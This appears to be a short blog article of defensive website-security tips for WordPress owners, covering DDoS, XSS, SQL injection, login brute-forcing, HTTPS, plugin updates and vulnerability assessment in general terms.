Defacement
A website is the front door and the face of your organization. Many hackers deface an organization by hacking their website and posting their message on it. (some well known victims: MIT, NASA, eBay, PayPal, Mossad, Forbes, WikiLeaks, Oracle, Russia Today)
DDoS
Attackers often use a Distributed Denial of Service attack to overwhelm a web server with requests that ends up bring a site down. It can greatly affect the owner financially especially if the website generates revenue. (examples of websites going down due to a DDoS attack: Netflix, Amazon, Twitter, Spotify, GitHub, xbox live)
Fortunately, CloudFlare offers a free DDoS protection for WordPress websites to get started.
OWASP
The Open Web Application Security Project (OWASP) is a not-for-profit organization that publishes a Top 10 list of the most common security flaws in web applications along with mitigation techniques.
They contain an excellent resource to help harden your website or web application. We highly recommend going over the list.
HTTPS
This is an easy and must have feature. Encrypting the traffic between your browser and the web server is critical to thwart Man-in-the-Middle attacks.
Chrome now marks ALL websites without https as "not secure"!
With free certificates like Let's Encrypt, there really isn't any excuse not to have TLS encryption (HTTPS) enabled. WordPress makes it easy with a plugin.
XSS
This is the most common vulnerability found in WordPress plugins.
Cross-Site Scripting is when an attacker injects malicious JavaScript code into the fields of your website that also causes an affect to other users. This can either create malicious popups with download links or alerts to call a number (social engineering), redirect pages to a phishing page, steal session cookies or other user data from logged in users. This can cause a hacker to log in without a password.
Validating entered data and sanitizing php code is a great way to mitigate this technique.
SQL Injection
SQL Injection is the top security vulnerability seen across websites. This is where an attacker inserts SQL statements in the web page input fields to extract data from the database. Watch this amazing interactive demo here to understand better.
Input validation is one of the quick and easy techniques to mitigate this.
Login
Hackers will often brute force random usernames and passwords on the backend login page of your website.
Keep the usernames anything but Admin, Administrator, or any employee usernames. They will use all of them in an attempt to get something right. If you have a plugin that prevents unauthorized attempts, then you lock out those usernames after 3 or more incorrect attempts. You now prevent your own admin from logging in!
- Pick a random or uncommon username.
- It goes without saying, passwords should be long and random (use a password manager).
- Use multi-factor authentication.
Block Countries
Sometimes blocking individual IP addresses from attacking your site doesn't have much of an affect as the attacker will keep changing their IP.
I get a lot of login attempts on my backend from random countries in quick succession. Since my target audience is primarily North America, I simply block entire offending countries from accessing my website by placing them in a black list. This solves the problem by and large.
For WordPress users "IP Geo Block" does a good job at this. This is a quick and dirty way to keep certain bots out. A seasoned foreign hacker can and will most likely use a US based VPN to get around this if you really are a target.
Updates
Plugins are full of vulnerabilities but add a lot of functionality to a website.
- Always update all plugins immediately. Each update comes with patches.
- Only install plugins that are updated frequently and have a lot of downloads. Ignore the ones with a few thousand downloads. It will save you time in the long run if they abandon it's development.
Vulnerability Assessment
With all the safeguards in place, a vulnerability assessment will always add value. It will show you things you missed and the level of risk involved. There are plenty of automated tools to perform this assessment, but hackers are mostly human, the human factor in auditing your website will always supersede tools. Use tools for what they are: tools!